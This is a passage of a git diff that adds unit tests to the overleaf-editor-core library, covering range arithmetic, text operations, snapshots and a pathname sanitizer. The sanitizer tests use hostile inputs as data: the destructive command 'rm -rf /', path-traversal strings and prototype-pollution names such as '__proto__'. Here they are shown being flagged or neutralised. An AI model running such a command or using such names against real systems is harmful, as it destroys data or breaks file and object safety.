expect(from5to13.contains(from4to14)).to.eql(false) + expect(from5to13.contains(from4to15)).to.eql(false) + expect(from5to13.contains(from5to13)).to.eql(true) + expect(from5to13.contains(from5to14)).to.eql(false) + expect(from5to13.contains(from5to15)).to.eql(false) + expect(from5to13.contains(from0to99)).to.eql(false) + + expect(from5to14.contains(from0to2)).to.eql(false) + expect(from5to14.contains(from4to13)).to.eql(false) + expect(from5to14.contains(from4to14)).to.eql(false) + expect(from5to14.contains(from4to15)).to.eql(false) + expect(from5to14.contains(from5to13)).to.eql(true) + expect(from5to14.contains(from5to14)).to.eql(true) + expect(from5to14.contains(from5to15)).to.eql(false) + expect(from5to14.contains(from0to99)).to.eql(false) + + expect(from5to15.contains(from0to2)).to.eql(false) + expect(from5to15.contains(from4to13)).to.eql(false) + expect(from5to15.contains(from4to14)).to.eql(false) + expect(from5to15.contains(from4to15)).to.eql(false) + expect(from5to15.contains(from5to13)).to.eql(true) + expect(from5to15.contains(from5to14)).to.eql(true) + expect(from5to15.contains(from5to15)).to.eql(true) + expect(from5to15.contains(from0to99)).to.eql(false) + + expect(from0to99.contains(from0to2)).to.eql(true) + expect(from0to99.contains(from4to13)).to.eql(true) + expect(from0to99.contains(from4to14)).to.eql(true) + expect(from0to99.contains(from4to15)).to.eql(true) + expect(from0to99.contains(from5to13)).to.eql(true) + expect(from0to99.contains(from5to14)).to.eql(true) + expect(from0to99.contains(from5to15)).to.eql(true) + expect(from0to99.contains(from0to99)).to.eql(true) + }) + + it('should check if range contains a cursor', function () { + const from5to14 = new Range(5, 10) + expect(from5to14.containsCursor(4)).to.eql(false) + expect(from5to14.containsCursor(5)).to.eql(true) + expect(from5to14.containsCursor(6)).to.eql(true) + expect(from5to14.containsCursor(14)).to.eql(true) + expect(from5to14.containsCursor(15)).to.eql(true) + expect(from5to14.containsCursor(16)).to.eql(false) + }) + + describe('subtract 
range from another', function () {
+    it('should not subtract', function () {
+      const from1to5 = new Range(1, 6)
+      const from0to1 = new Range(0, 1)
+      const subtracted = from1to5.subtract(from0to1)
+      expect(subtracted.start).to.eql(1)
+      expect(subtracted.length).to.eql(6)
+    })
+
+    it('should subtract from the left', function () {
+      const from5to19 = new Range(5, 15)
+      const from15to24 = new Range(15, 10)
+      const subtracted = from15to24.subtract(from5to19)
+      expect(subtracted.start).to.eql(5)
+      expect(subtracted.end).to.eql(10)
+    })
+
+    it('should subtract from the right', function () {
+      const from10to24 = new Range(10, 15)
+      const from5to19 = new Range(5, 15)
+      const subtracted = from5to19.subtract(from10to24)
+      expect(subtracted.start).to.eql(5)
+      expect(subtracted.end).to.eql(10)
+    })
+
+    it('should subtract from the middle', function () {
+      const from5to19 = new Range(5, 15)
+      const from10to14 = new Range(10, 5)
+      const subtracted = from5to19.subtract(from10to14)
+      expect(subtracted.start).to.eql(5)
+      expect(subtracted.end).to.eql(15)
+    })
+
+    it('should delete entire range', function () {
+      const from0to99 = new Range(0, 100)
+      const from5to19 = new Range(5, 15)
+      const subtracted = from5to19.subtract(from0to99)
+      expect(subtracted.start).to.eql(5)
+      expect(subtracted.end).to.eql(5)
+      expect(subtracted.length).to.eql(0)
+    })
+
+    it('should not subtract if ranges do not overlap', function () {
+      const from5to14 = new Range(5, 10)
+      const from20to29 = new Range(20, 10)
+      const subtracted1 = from5to14.subtract(from20to29)
+      const subtracted2 = from20to29.subtract(from5to14)
+      expect(subtracted1.toRaw()).deep.equal(from5to14.toRaw())
+      expect(subtracted2.toRaw()).deep.equal(from20to29.toRaw())
+    })
+  })
+
+  describe('merge ranges', function () {
+    it('should merge ranges overlapping at the end', function () {
+      const from5to14 = new Range(5, 10)
+      const from10to19 = new Range(10, 10)
+      expect(from5to14.canMerge(from10to19)).to.eql(true)
+      const result = from5to14.merge(from10to19)
+      expect(result.start).to.eql(5)
+      expect(result.end).to.eql(20)
+    })
+
+    it('should merge ranges overlapping at the start', function () {
+      const from5to14 = new Range(5, 10)
+      const from0to9 = new Range(0, 10)
+      expect(from5to14.canMerge(from0to9)).to.eql(true)
+      const result = from5to14.merge(from0to9)
+      expect(result.start).to.eql(0)
+      expect(result.end).to.eql(15)
+    })
+
+    it('should merge ranges if one is covered by another', function () {
+      const from5to14 = new Range(5, 10)
+      const from0to19 = new Range(0, 20)
+      expect(from5to14.canMerge(from0to19)).to.eql(true)
+      const result = from5to14.merge(from0to19)
+      expect(result.toRaw()).deep.equal(from0to19.toRaw())
+    })
+
+    it('should produce the same length after merge', function () {
+      const from5to14 = new Range(5, 10)
+      const from0to19 = new Range(0, 20)
+      expect(from0to19.canMerge(from5to14)).to.eql(true)
+      const result = from0to19.merge(from5to14)
+      expect(result.start).to.eql(0)
+      expect(result.end).to.eql(20)
+    })
+
+    it('should not merge ranges if they do not overlap', function () {
+      const from5to14 = new Range(5, 10)
+      const from20to29 = new Range(20, 10)
+      expect(from5to14.canMerge(from20to29)).to.eql(false)
+      expect(from20to29.canMerge(from5to14)).to.eql(false)
+      expect(() => from5to14.merge(from20to29)).to.throw()
+    })
+  })
+
+  it('should check if range starts after a range', function () {
+    const from0to4 = new Range(0, 5)
+    const from1to5 = new Range(1, 5)
+    const from5to9 = new Range(5, 5)
+    const from6to10 = new Range(6, 5)
+    const from10to14 = 
new Range(10, 5) + + expect(from0to4.startsAfter(from0to4)).to.eql(false) + expect(from0to4.startsAfter(from1to5)).to.eql(false) + expect(from0to4.startsAfter(from5to9)).to.eql(false) + expect(from0to4.startsAfter(from6to10)).to.eql(false) + expect(from0to4.startsAfter(from10to14)).to.eql(false) + + expect(from1to5.startsAfter(from0to4)).to.eql(false) + expect(from1to5.startsAfter(from1to5)).to.eql(false) + expect(from1to5.startsAfter(from5to9)).to.eql(false) + expect(from1to5.startsAfter(from6to10)).to.eql(false) + expect(from1to5.startsAfter(from10to14)).to.eql(false) + + expect(from5to9.startsAfter(from0to4)).to.eql(true) + expect(from5to9.startsAfter(from1to5)).to.eql(false) + expect(from5to9.startsAfter(from5to9)).to.eql(false) + expect(from5to9.startsAfter(from6to10)).to.eql(false) + expect(from5to9.startsAfter(from10to14)).to.eql(false) + + expect(from6to10.startsAfter(from0to4)).to.eql(true) + expect(from6to10.startsAfter(from1to5)).to.eql(true) + expect(from6to10.startsAfter(from5to9)).to.eql(false) + expect(from6to10.startsAfter(from6to10)).to.eql(false) + expect(from6to10.startsAfter(from10to14)).to.eql(false) + + expect(from10to14.startsAfter(from0to4)).to.eql(true) + expect(from10to14.startsAfter(from1to5)).to.eql(true) + expect(from10to14.startsAfter(from5to9)).to.eql(true) + expect(from10to14.startsAfter(from6to10)).to.eql(false) + expect(from10to14.startsAfter(from10to14)).to.eql(false) + }) + + it('should check if range starts after a position', function () { + const from5to14 = new Range(5, 10) + expect(from5to14.startIsAfter(3)).to.be.true + expect(from5to14.startIsAfter(4)).to.be.true + expect(from5to14.startIsAfter(5)).to.be.false + expect(from5to14.startIsAfter(6)).to.be.false + expect(from5to14.startIsAfter(15)).to.be.false + expect(from5to14.startIsAfter(16)).to.be.false + }) + + it('should extend the range', function () { + const from5to14 = new Range(5, 10) + const result = from5to14.extendBy(3) + expect(result.length).to.eql(13) + expect(result.start).to.eql(5) + expect(result.end).to.eql(18) + }) + + it('should shrink the range', function () { + const from5to14 = new Range(5, 10) + const result = from5to14.shrinkBy(3) + expect(result.length).to.eql(7) + expect(result.start).to.eql(5) + expect(result.end).to.eql(12) + }) + + it('should throw if shrinking too much', function () { + const from5to14 = new Range(5, 10) + expect(() => from5to14.shrinkBy(11)).to.throw() + }) + + it('should move the range', function () { + const from5to14 = new Range(5, 10) + const result = from5to14.moveBy(3) + expect(result.length).to.eql(10) + expect(result.start).to.eql(8) + expect(result.end).to.eql(18) + }) + + describe('splitAt', function () { + it('should split at the start', function () { + const range = new Range(5, 10) + const [left, right] = range.splitAt(5) + expect(left.isEmpty()).to.be.true + expect(right.start).to.eql(5) + expect(right.end).to.eql(15) + }) + + it('should not split before the start', function () { + const range = new Range(5, 10) + expect(() => range.splitAt(4)).to.throw() + }) + + it('should split at last cursor in range', function () { + const range = new Range(5, 10) + const [left, right] = range.splitAt(14) + expect(left.start).to.equal(5) + expect(left.end).to.equal(14) + expect(right.start).to.equal(14) + expect(right.end).to.equal(15) + }) + + it('should not split after the end', function () { + const range = new Range(5, 10) + expect(() => range.splitAt(16)).to.throw() + }) + + it('should split at end', function () { + const range = new Range(5, 
10) + const [left, right] = range.splitAt(15) + expect(left.start).to.equal(5) + expect(left.end).to.equal(15) + expect(right.start).to.equal(15) + expect(right.end).to.equal(15) + }) + + it('should split in the middle', function () { + const range = new Range(5, 10) + const [left, right] = range.splitAt(10) + expect(left.start).to.equal(5) + expect(left.end).to.equal(10) + expect(right.start).to.equal(10) + expect(right.end).to.equal(15) + }) + }) + + describe('insertAt', function () { + it('should insert at the start', function () { + const range = new Range(5, 10) + const [left, inserted, right] = range.insertAt(5, 3) + expect(left.isEmpty()).to.be.true + expect(inserted.start).to.eql(5) + expect(inserted.end).to.eql(8) + expect(right.start).to.eql(8) + expect(right.end).to.eql(18) + }) + + it('should insert at the end', function () { + const range = new Range(5, 10) + const [left, inserted, right] = range.insertAt(15, 3) + expect(left.start).to.eql(5) + expect(left.end).to.eql(15) + expect(inserted.start).to.eql(15) + expect(inserted.end).to.eql(18) + expect(right.isEmpty()).to.be.true + }) + + it('should insert in the middle', function () { + const range = new Range(5, 10) + const [left, inserted, right] = range.insertAt(10, 3) + expect(left.start).to.eql(5) + expect(left.end).to.eql(10) + expect(inserted.start).to.eql(10) + expect(inserted.end).to.eql(13) + expect(right.start).to.eql(13) + expect(right.end).to.eql(18) + }) + + it('should throw if cursor is out of range', function () { + const range = new Range(5, 10) + expect(() => range.insertAt(4, 3)).to.throw() + expect(() => range.insertAt(16, 3)).to.throw() + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/safe_pathname.test.js b/libraries/overleaf-editor-core/test/safe_pathname.test.js new file mode 100644 index 0000000..bfde298 --- /dev/null +++ b/libraries/overleaf-editor-core/test/safe_pathname.test.js @@ -0,0 +1,126 @@ +'use strict' + +const { expect } = require('chai') +const ot = require('..') +const safePathname = ot.safePathname + +describe('safePathname', function () { + function expectClean(input, output, reason = '') { + // check expected output and also idempotency + const [cleanedInput, gotReason] = safePathname.cleanDebug(input) + expect(cleanedInput).to.equal(output) + expect(gotReason).to.equal(reason) + expect(safePathname.clean(cleanedInput)).to.equal(cleanedInput) + expect(safePathname.isClean(cleanedInput)).to.be.true + } + + it('cleans pathnames', function () { + // preserve valid pathnames + expectClean('llama.jpg', 'llama.jpg') + expectClean('DSC4056.JPG', 'DSC4056.JPG') + + // detects unclean pathnames + expect(safePathname.isClean('rm -rf /')).to.be.false + + // replace invalid characters with underscores + expectClean( + 'test-s*\u0001\u0002m\u0007st\u0008.jpg', + 'test-s___m_st_.jpg', + 'cleanPart' + ) + + // keep slashes, normalize paths, replace .. 
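+ // ('..' segments that survive normalization are replaced with '__' by cleanPart; the reason string in each expectation below records which rules fired)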
+ expectClean('./foo', 'foo', 'normalize') + expectClean('../foo', '__/foo', 'cleanPart') + expectClean('foo/./bar', 'foo/bar', 'normalize') + expectClean('foo/../bar', 'bar', 'normalize') + expectClean('../../tricky/foo.bar', '__/__/tricky/foo.bar', 'cleanPart') + expectClean( + 'foo/../../tricky/foo.bar', + '__/tricky/foo.bar', + 'normalize,cleanPart' + ) + expectClean('foo/bar/../../tricky/foo.bar', 'tricky/foo.bar', 'normalize') + expectClean( + 'foo/bar/baz/../../tricky/foo.bar', + 'foo/tricky/foo.bar', + 'normalize' + ) + + // remove illegal chars even when there is no extension + expectClean('**foo', '__foo', 'cleanPart') + + // convert windows file paths to forward slashes + expectClean('c:\\temp\\foo.txt', 'c:/temp/foo.txt', 'workaround for IE') + + // do not allow leading slashes, single or multiple (relative paths only) + expectClean('/foo', '_/foo', 'no leading /') + expectClean('//foo', '_/foo', 'normalize,no leading /') + + // do not allow a trailing slash + expectClean('/', '_', 'no leading /,no trailing /') + expectClean('foo/', 'foo', 'no trailing /') + expectClean('foo.tex/', 'foo.tex', 'no trailing /') + + // do not allow multiple trailing slashes + expectClean('//', '_', 'normalize,no leading /,no trailing /') + expectClean('///', '_', 'normalize,no leading /,no trailing /') + expectClean('foo//', 'foo', 'normalize,no trailing /') + + // file and folder names that consist of . and .. are not OK + expectClean('.', '_', 'cleanPart') + expectClean('..', '__', 'cleanPart') + // we do allow names with more dots, e.g. ... and .... + expectClean('...', '...') + expectClean('....', '....') + expectClean('foo/...', 'foo/...') + expectClean('foo/....', 'foo/....') + expectClean('foo/.../bar', 'foo/.../bar') + expectClean('foo/..../bar', 'foo/..../bar') + + // leading dots are OK + expectClean('._', '._') + expectClean('.gitignore', '.gitignore') + + // trailing dots are not OK on Windows but we allow them + expectClean('_.', '_.') + expectClean('foo/_.', 'foo/_.') + expectClean('foo/_./bar', 'foo/_./bar') + expectClean('foo/_../bar', 'foo/_../bar') + + // spaces are allowed + expectClean('a b.png', 'a b.png') + + // leading and trailing spaces are not OK + expectClean(' foo', 'foo', 'no leading spaces') + expectClean(' foo', 'foo', 'no leading spaces') + expectClean('foo ', 'foo', 'no trailing spaces') + expectClean('foo ', 'foo', 'no trailing spaces') + + // reserved file names on Windows should not be OK, but we already have + // some in the old system, so we have to allow them for now + expectClean('AUX', 'AUX') + expectClean('foo/AUX', 'foo/AUX') + expectClean('AUX/foo', 'AUX/foo') + + // multiple dots are OK + expectClean('a.b.png', 'a.b.png') + expectClean('a.code.tex', 'a.code.tex') + + // there's no particular reason to allow multiple slashes; sometimes people + // seem to rename files to URLs (https://domain/path) in an attempt to + // upload a file, and this results in an empty directory name + expectClean('foo//bar.png', 'foo/bar.png', 'normalize') + expectClean('foo///bar.png', 'foo/bar.png', 'normalize') + + // Check javascript property handling + expectClean('foo/prototype', 'foo/prototype') // OK as part of a pathname + expectClean('prototype/test.txt', 'prototype/test.txt') + expectClean('prototype', '@prototype', 'BLOCKED_FILE_RX') // not OK as whole pathname + expectClean('hasOwnProperty', '@hasOwnProperty', 'BLOCKED_FILE_RX') + expectClean('**proto**', '@__proto__', 'cleanPart,BLOCKED_FILE_RX') + }) 
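+ // Note: expectClean's optional third argument is the comma-separated list of cleanDebug rules expected to fire; omitting it asserts the input was already clean.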
+}) diff --git a/libraries/overleaf-editor-core/test/scan_op.test.js b/libraries/overleaf-editor-core/test/scan_op.test.js new file mode 100644 index 0000000..80ab691 --- /dev/null +++ b/libraries/overleaf-editor-core/test/scan_op.test.js @@ -0,0 +1,477 @@ +// @ts-check +const { expect } = require('chai') +const { + RetainOp, + ScanOp, + InsertOp, + RemoveOp, +} = require('../lib/operation/scan_op') +const { UnprocessableError, ApplyError } = require('../lib/errors') +const TrackingProps = require('../lib/file_data/tracking_props') + +describe('ScanOp', function () { + describe('fromJSON', function () { + it('constructs a RetainOp from object', function () { + const op = ScanOp.fromJSON({ r: 1 }) + expect(op).to.be.instanceOf(RetainOp) + expect(/** @type {RetainOp} */ (op).length).to.equal(1) + }) + + it('constructs a RetainOp from number', function () { + const op = ScanOp.fromJSON(2) + expect(op).to.be.instanceOf(RetainOp) + expect(/** @type {RetainOp} */ (op).length).to.equal(2) + }) + + it('constructs an InsertOp from string', function () { + const op = ScanOp.fromJSON('abc') + expect(op).to.be.instanceOf(InsertOp) + expect(/** @type {InsertOp} */ (op).insertion).to.equal('abc') + }) + + it('constructs an InsertOp from object', function () { + const op = ScanOp.fromJSON({ i: 'abc' }) + expect(op).to.be.instanceOf(InsertOp) + expect(/** @type {InsertOp} */ (op).insertion).to.equal('abc') + }) + + it('constructs a RemoveOp from number', function () { + const op = ScanOp.fromJSON(-2) + expect(op).to.be.instanceOf(RemoveOp) + expect(/** @type {RemoveOp} */ (op).length).to.equal(2) + }) + + it('throws an error for invalid input', function () { + expect(() => ScanOp.fromJSON(/** @type {any} */ ({}))).to.throw( + UnprocessableError + ) + }) + + it('throws an error for zero', function () { + expect(() => ScanOp.fromJSON(0)).to.throw(UnprocessableError) + }) + }) +}) + +describe('RetainOp', function () { + it('is equal to another RetainOp with the same length', function () { + const op1 = new RetainOp(1) + const op2 = new RetainOp(1) + expect(op1.equals(op2)).to.be.true + }) + + it('is not equal to another RetainOp with a different length', function () { + const op1 = new RetainOp(1) + const op2 = new RetainOp(2) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another RetainOp with no tracking info', function () { + const op1 = new RetainOp( + 4, + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new RetainOp(4) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another RetainOp with different tracking info', function () { + const op1 = new RetainOp( + 4, + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new RetainOp( + 4, + new TrackingProps('insert', 'user2', new Date('2024-01-01T00:00:00.000Z')) + ) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to an InsertOp', function () { + const op1 = new RetainOp(1) + const op2 = new InsertOp('a') + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to a RemoveOp', function () { + const op1 = new RetainOp(1) + const op2 = new RemoveOp(1) + expect(op1.equals(op2)).to.be.false + }) + + it('can merge with another RetainOp', function () { + const op1 = new RetainOp(1) + const op2 = new RetainOp(2) + expect(op1.canMergeWith(op2)).to.be.true + op1.mergeWith(op2) + expect(op1.equals(new RetainOp(3))).to.be.true + }) + + it('cannot merge with another RetainOp if tracking info is different', function () { + 
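+ // RetainOps merge only when their TrackingProps match; mergeWith throws otherwise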
const op1 = new RetainOp( + 4, + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new RetainOp( + 4, + new TrackingProps('insert', 'user2', new Date('2024-01-01T00:00:00.000Z')) + ) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('can merge with another RetainOp if tracking info is the same', function () { + const op1 = new RetainOp( + 4, + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new RetainOp( + 4, + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + op1.mergeWith(op2) + expect( + op1.equals( + new RetainOp( + 8, + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ) + ) + ) + ).to.be.true + }) + + it('cannot merge with an InsertOp', function () { + const op1 = new RetainOp(1) + const op2 = new InsertOp('a') + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('cannot merge with a RemoveOp', function () { + const op1 = new RetainOp(1) + const op2 = new RemoveOp(1) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('can be converted to JSON', function () { + const op = new RetainOp(3) + expect(op.toJSON()).to.equal(3) + }) + + it('adds to the length and cursor when applied to length', function () { + const op = new RetainOp(3) + const { length, inputCursor } = op.applyToLength({ + length: 10, + inputCursor: 10, + inputLength: 30, + }) + expect(length).to.equal(13) + expect(inputCursor).to.equal(13) + }) +}) + +describe('InsertOp', function () { + it('is equal to another InsertOp with the same insertion', function () { + const op1 = new InsertOp('a') + const op2 = new InsertOp('a') + expect(op1.equals(op2)).to.be.true + }) + + it('is not equal to another InsertOp with a different insertion', function () { + const op1 = new InsertOp('a') + const op2 = new InsertOp('b') + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another InsertOp with no tracking info', function () { + const op1 = new InsertOp( + 'a', + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new InsertOp('a') + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another InsertOp with different tracking info', function () { + const op1 = new InsertOp( + 'a', + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new InsertOp( + 'a', + new TrackingProps('insert', 'user2', new Date('2024-01-01T00:00:00.000Z')) + ) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another InsertOp with no comment ids', function () { + const op1 = new InsertOp('a', undefined, ['1']) + const op2 = new InsertOp('a') + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another InsertOp with tracking info', function () { + const op1 = new InsertOp('a', undefined) + const op2 = new InsertOp( + 'a', + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another InsertOp with comment ids', function () { + const op1 = new InsertOp('a') + const op2 = new InsertOp('a', undefined, ['1']) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another InsertOp with different comment ids', function () { + const op1 = new InsertOp('a', undefined, ['1']) + const op2 = new InsertOp('a', undefined, 
['2']) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to another InsertOp with overlapping comment ids', function () { + const op1 = new InsertOp('a', undefined, ['1']) + const op2 = new InsertOp('a', undefined, ['2', '1']) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to a RetainOp', function () { + const op1 = new InsertOp('a') + const op2 = new RetainOp(1) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to a RemoveOp', function () { + const op1 = new InsertOp('a') + const op2 = new RemoveOp(1) + expect(op1.equals(op2)).to.be.false + }) + + it('can merge with another InsertOp', function () { + const op1 = new InsertOp('a') + const op2 = new InsertOp('b') + expect(op1.canMergeWith(op2)).to.be.true + op1.mergeWith(op2) + expect(op1.equals(new InsertOp('ab'))).to.be.true + }) + + it('cannot merge with another InsertOp if comment id info is different', function () { + const op1 = new InsertOp('a', undefined, ['1']) + const op2 = new InsertOp('b', undefined, ['1', '2']) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('cannot merge with another InsertOp if comment id info is different while tracking info matches', function () { + const op1 = new InsertOp( + 'a', + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ), + ['1', '2'] + ) + const op2 = new InsertOp( + 'b', + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ), + ['3'] + ) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('cannot merge with another InsertOp if comment id is present in other and tracking info matches', function () { + const op1 = new InsertOp( + 'a', + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new InsertOp( + 'b', + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ), + ['1'] + ) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('cannot merge with another InsertOp if tracking info is different', function () { + const op1 = new InsertOp( + 'a', + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const op2 = new InsertOp( + 'b', + new TrackingProps('insert', 'user2', new Date('2024-01-01T00:00:00.000Z')) + ) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('can merge with another InsertOp if tracking and comment info is the same', function () { + const op1 = new InsertOp( + 'a', + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ), + ['1', '2'] + ) + const op2 = new InsertOp( + 'b', + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ), + ['1', '2'] + ) + expect(op1.canMergeWith(op2)).to.be.true + op1.mergeWith(op2) + expect( + op1.equals( + new InsertOp( + 'ab', + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ), + ['1', '2'] + ) + ) + ).to.be.true + }) + + it('cannot merge with a RetainOp', function () { + const op1 = new InsertOp('a') + const op2 = new RetainOp(1) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('cannot merge with a RemoveOp', function () { + const op1 = new InsertOp('a') + const op2 = new RemoveOp(1) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => 
op1.mergeWith(op2)).to.throw(Error) + }) + + it('can be converted to JSON', function () { + const op = new InsertOp('a') + expect(op.toJSON()).to.equal('a') + }) + + it('adds to the length when applied to length', function () { + const op = new InsertOp('abc') + const { length, inputCursor } = op.applyToLength({ + length: 10, + inputCursor: 20, + inputLength: 40, + }) + expect(length).to.equal(13) + expect(inputCursor).to.equal(20) + }) + + it('can apply a retain of the rest of the input', function () { + const op = new RetainOp(10) + const { length, inputCursor } = op.applyToLength({ + length: 10, + inputCursor: 5, + inputLength: 15, + }) + expect(length).to.equal(20) + expect(inputCursor).to.equal(15) + }) + + it('cannot apply to length if the input cursor is at the end', function () { + const op = new RetainOp(10) + expect(() => + op.applyToLength({ + length: 10, + inputCursor: 10, + inputLength: 10, + }) + ).to.throw(ApplyError) + }) +}) + +describe('RemoveOp', function () { + it('is equal to another RemoveOp with the same length', function () { + const op1 = new RemoveOp(1) + const op2 = new RemoveOp(1) + expect(op1.equals(op2)).to.be.true + }) + + it('is not equal to another RemoveOp with a different length', function () { + const op1 = new RemoveOp(1) + const op2 = new RemoveOp(2) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to a RetainOp', function () { + const op1 = new RemoveOp(1) + const op2 = new RetainOp(1) + expect(op1.equals(op2)).to.be.false + }) + + it('is not equal to an InsertOp', function () { + const op1 = new RemoveOp(1) + const op2 = new InsertOp('a') + expect(op1.equals(op2)).to.be.false + }) + + it('can merge with another RemoveOp', function () { + const op1 = new RemoveOp(1) + const op2 = new RemoveOp(2) + expect(op1.canMergeWith(op2)).to.be.true + op1.mergeWith(op2) + expect(op1.equals(new RemoveOp(3))).to.be.true + }) + + it('cannot merge with a RetainOp', function () { + const op1 = new RemoveOp(1) + const op2 = new RetainOp(1) + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('cannot merge with an InsertOp', function () { + const op1 = new RemoveOp(1) + const op2 = new InsertOp('a') + expect(op1.canMergeWith(op2)).to.be.false + expect(() => op1.mergeWith(op2)).to.throw(Error) + }) + + it('can be converted to JSON', function () { + const op = new RemoveOp(3) + expect(op.toJSON()).to.equal(-3) + }) + + it('adds to the input cursor when applied to length', function () { + const op = new RemoveOp(3) + const { length, inputCursor } = op.applyToLength({ + length: 10, + inputCursor: 10, + inputLength: 30, + }) + expect(length).to.equal(10) + expect(inputCursor).to.equal(13) + }) +}) diff --git a/libraries/overleaf-editor-core/test/snapshot.test.js b/libraries/overleaf-editor-core/test/snapshot.test.js new file mode 100644 index 0000000..f797995 --- /dev/null +++ b/libraries/overleaf-editor-core/test/snapshot.test.js @@ -0,0 +1,92 @@ +'use strict' + +const { expect } = require('chai') +const { + File, + Snapshot, + TextOperation, + Change, + EditFileOperation, +} = require('..') + +describe('Snapshot', function () { + describe('findBlobHashes', function () { + it('finds blob hashes from files', function () { + const snapshot = new Snapshot() + + const blobHashes = new Set() + snapshot.findBlobHashes(blobHashes) + expect(blobHashes.size).to.equal(0) + + // Add a file without a hash. 
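+ // (a file created with File.fromString has content but no blob hash, so the set stays empty)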
+ snapshot.addFile('foo', File.fromString('')) + snapshot.findBlobHashes(blobHashes) + expect(blobHashes.size).to.equal(0) + + // Add a file with a hash. + snapshot.addFile('bar', File.fromHash(File.EMPTY_FILE_HASH)) + snapshot.findBlobHashes(blobHashes) + expect(Array.from(blobHashes)).to.have.members([File.EMPTY_FILE_HASH]) + }) + }) + + describe('editFile', function () { + let snapshot + let operation + + beforeEach(function () { + snapshot = new Snapshot() + snapshot.addFile('hello.txt', File.fromString('hello')) + operation = new TextOperation() + operation.retain(5) + operation.insert(' world!') + }) + + it('applies text operations to the file', function () { + snapshot.editFile('hello.txt', operation) + const file = snapshot.getFile('hello.txt') + expect(file.getContent()).to.equal('hello world!') + }) + + it('rejects text operations for nonexistent file', function () { + expect(() => { + snapshot.editFile('does-not-exist.txt', operation) + }).to.throw(Snapshot.EditMissingFileError) + }) + }) + + describe('applyAll', function () { + let snapshot + let change + + beforeEach(function () { + snapshot = new Snapshot() + snapshot.addFile('empty.txt', File.fromString('')) + const badTextOp = new TextOperation() + badTextOp.insert('FAIL!') + const goodTextOp = new TextOperation() + goodTextOp.insert('SUCCESS!') + change = new Change( + [ + new EditFileOperation('missing.txt', badTextOp), + new EditFileOperation('empty.txt', goodTextOp), + ], + new Date() + ) + }) + + it('ignores recoverable errors', function () { + snapshot.applyAll([change]) + const file = snapshot.getFile('empty.txt') + expect(file.getContent()).to.equal('SUCCESS!') + }) + + it('stops on recoverable errors in strict mode', function () { + expect(() => { + snapshot.applyAll([change], { strict: true }) + }).to.throw(Snapshot.EditMissingFileError) + const file = snapshot.getFile('empty.txt') + expect(file.getContent()).to.equal('') + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/string_file_data.test.js b/libraries/overleaf-editor-core/test/string_file_data.test.js new file mode 100644 index 0000000..45a0337 --- /dev/null +++ b/libraries/overleaf-editor-core/test/string_file_data.test.js @@ -0,0 +1,167 @@ +// @ts-check +'use strict' + +const { expect } = require('chai') +const _ = require('lodash') + +const ot = require('..') +const StringFileData = require('../lib/file_data/string_file_data') +const TextOperation = ot.TextOperation + +describe('StringFileData', function () { + it('throws when it contains non BMP chars', function () { + const content = '𝌆𝌆𝌆' + const fileData = new StringFileData(content) + const operation = new TextOperation() + operation.insert('aa') + expect(() => { + fileData.edit(operation) + }).to.throw(TextOperation.ApplyError, /string contains non BMP characters/) + }) + + it('validates string length when edited', function () { + const longString = _.repeat('a', TextOperation.MAX_STRING_LENGTH) + const fileData = new StringFileData(longString) + expect(fileData.getByteLength()).to.equal(longString.length) + 